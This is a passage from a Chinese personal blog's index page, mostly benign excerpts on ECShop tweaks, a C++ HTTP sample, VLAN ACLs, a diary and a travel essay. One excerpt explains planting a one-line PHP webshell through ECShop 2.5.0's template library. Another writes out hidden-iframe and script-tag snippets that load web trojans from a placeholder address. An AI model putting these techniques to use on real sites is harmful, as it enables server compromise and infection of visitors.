Ti

本周乐卡：1.巴黎铁塔 2.游叶 3.暗恋桃花源 4.外白渡桥

[singlepic id=73 w=320 h=240 mode=web20 ]
外白渡桥
Read More…

# 😆 Ti：有同学说这个很老了，去年十月国内就有人发过了，看了下，的确是，地址在这里。虽然是老的，但是以前没发过，所以也就不删了，留在这里存档吧。

PS:进去后 在“模板管理”-》“库项目管理”，然后选择myship.lbi，在模板里面随便插入一句话小马，在连接http://www.target.com/myship.php文件就可以了，ECshop的smarty模板机制是允许直接执行php代码。

######################### Securitylab.ir ########################
# Application Info:
# Name: ECSHOP
# Version: 2.5.0
# Website: http://www.ecshop.com
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################

Read More…

商城系统批量上传一般用CSV，最近研究了在Ecshop下图片批量实现方法。
图片指的优点是容易操作，图形界面，对新手很友好，缺点是没有CSV那样灵活。

[singlepic id=76 w=320 h=240 mode=web20 ]

      网页挂马的形式多种多样，主要是通过利用IE漏洞进行传播，网页被挂马是服务器安全中最重要的一环。挂马并不是仅仅将恶意代码写入正常网页这么简单，因为对于挂马者来说，希望网页木马的生存时间能尽可能地长，按照现在的黑客产业链的黑市价格，在一个大型社区网站挂一个小时的网页木马就需要几千元人民币，所以为了躲避管理员的检查，挂马的黑客们绞尽脑汁，网页木马的隐藏技术也因此得到了极大的发展，大致有以下几种。

（1）在页面插入一个隐藏的框架：在网页中插入一段如下的HTML代码：<iframe src=http://网页木马地址width=0 height=0></iframe>，其中width和height属性为0意味着该框架是不可见的，受害者若不查看源代码很难发现网页木马。这个方法也是挂马最常用的一段代码，但是随着网站管理员和广大网民安全意识的提高，只要在源代码中搜索iframe这个关键字，就很容易找到网页木马的源头。

（2）利用JavaScript引入网页木马：相比iframe这个标签，<SCRIPT src=”http://xx.js” type=text/javascript>这段代码就显得更加隐蔽，因为几乎95%的网页中都会出现类似的script 标签，利用js引入网页木马也有多种方法：

Read More…

在做okitems.com时，客户要求在商品页面添加放大镜效果，开始以为套上lightbox就行，后面在这上面还是出了点问题．

１.   开始把lightbox的js放在head中,由于页面加载是按顺序加载，先加载js，导致不能正确识别到后面的标签，把js 改放在</body>前。

２.   Ecshop的common.js和lightbox 2.4的prototype.js冲突，使ecshop的一些js调用失败．最后只能换个没带prototype.js的版本。

下面的来自　http://www.huddletogether.com/projects/lightbox2/　２.４的lightbox可以从这边下。

Read More…

	
#include "stdafx.h" 
	
#include <iostream> 
	
#include <string> 
	
#include "http\request.h" 
	
 
	
using namespace std; 
	
 
	
int _tmain(int argc, _TCHAR* argv[]) 
	
{ 
	
    Request myRequest;      //初始化类 
	
    string sHeaderSend;     //定义http头 
	
    string sHeaderReceive;  //返回头 
	
    string sMessage="";     //返回页面内容 
	
    bool IsPost=false;  //是否Post提交 
	
 
	
    int i =myRequest.SendRequest(IsPost, "http://neeao.com", sHeaderSend, 
	
                                 sHeaderReceive, sMessage); 
	
    if (i) 
	
    {    
	
        cout<<"Http头:"<<endl; 
	
        cout<< sHeaderSend <<endl; 
	
        cout<<"响应头"<<endl; 
	
        cout<< sHeaderReceive <<endl; 
	
        cout<<"网页内容"<<endl; 
	
        cout<< sMessage <<endl; 
	
    }else 
	
    { 
	
        cout<<"网络不可到达"<<endl; 
	
    } 
	
    system("pause"); 
	
    return 0; 
	
} 

直接上代码了，blog附件上传貌似有点问题，

Read More…

今天很失败，第一次给这么彻底否定

VI递来一支烟，没感觉的抽完它

小贱人说我哪个都想要，最后都没有

其实哪个都不想要  不知道为什么会变成现在这样

0、1 。。。。以后什么都没了

外婆病了，看起来好瘦

听ST上面的Future，前面是一堆的试卷，说好只负责出题，最后回来发现这些试卷又压回桌上。

题目出的有些变态，不过每张都写的满满的，很意外。。。估计看完这些头要大了，唐僧这次用的上了。

星爷  那个只知道蹭饭的   给骗过去监考，至今还蒙在鼓里。

第一次看 猫 考试，很认真的样子   感觉很好    说不清为什么想她来到这边。

看她Q的头像，找不上话题      S说这是心理作用   淡定。。。

婷今天没来，可能早猜到了。。。复杂的女人

NP收宫，没上56cto发战报，对那些战友深深忏悔下

在学校没多少日子，下面要准备跑路了

明德楼这边地形比下安好，安静+有自己空间   累了还可以看城市画报

外婆病了，一个给了我童年的老人  明天要去看她

        最近碰到如何实现VLAN之间的访问控制，一般在三层交换机上直接把ACL应用到相应VLAN的虚端口就OK了，其实我自己也没有机会去真正实践过。眼下正巧有个项目涉及到这方面的需求，于是对如何实现VLAN之间的访问控制仔细研究了一番，这才发现VLAN访问控制列表（VACL）和VLAN之间的访问控制列表其实在实现方式上是有很大不同的，虽然从字面上看两者差不多。

　　常说的VLAN之间的访问控制，它的实现方式是将ACL直接应用到VLAN的虚端口上，与应用到物理端口的ACL实现方式是一样的。而VLAN访问控制（VACL），也称为VLAN访问映射表，它的实现方式与前者完全不同。它应用于VLAN中的所有通信流，支持基于ETHERTYPE和MAC地址的过滤，可以防止未经授权的数据流进入VLAN.目前支持的VACL操作有三种：转发（forward），丢弃（drop），重定向（redirect）。

Read More…

转自：泡网 作者：satao

旅

一
逐渐厌倦在中国的旅行。

二
按我的理解，旅行无非两个目的，财富声名或者纯粹专业兴趣爱好，马帮、盲流、驼队都属于前者，而那些发现者，斯文赫定、施泰因之类两者兼之，带着专一眼光的地质、人类学、民俗学、考古、动植物学者（再加上早前的博物学家）属于后者。至于嬉皮和艺术家的流浪，不在旅行之列， 因天灾人祸战争瘟疫被迫的迁徙也不能产生任何旅行的乐趣。
而中国今天这样大规模以毫无深度的观光观花为目的壮观旅游场面为人类史所仅见，其疯狂程度与程式化也吊诡至令人难以想象。
Read More…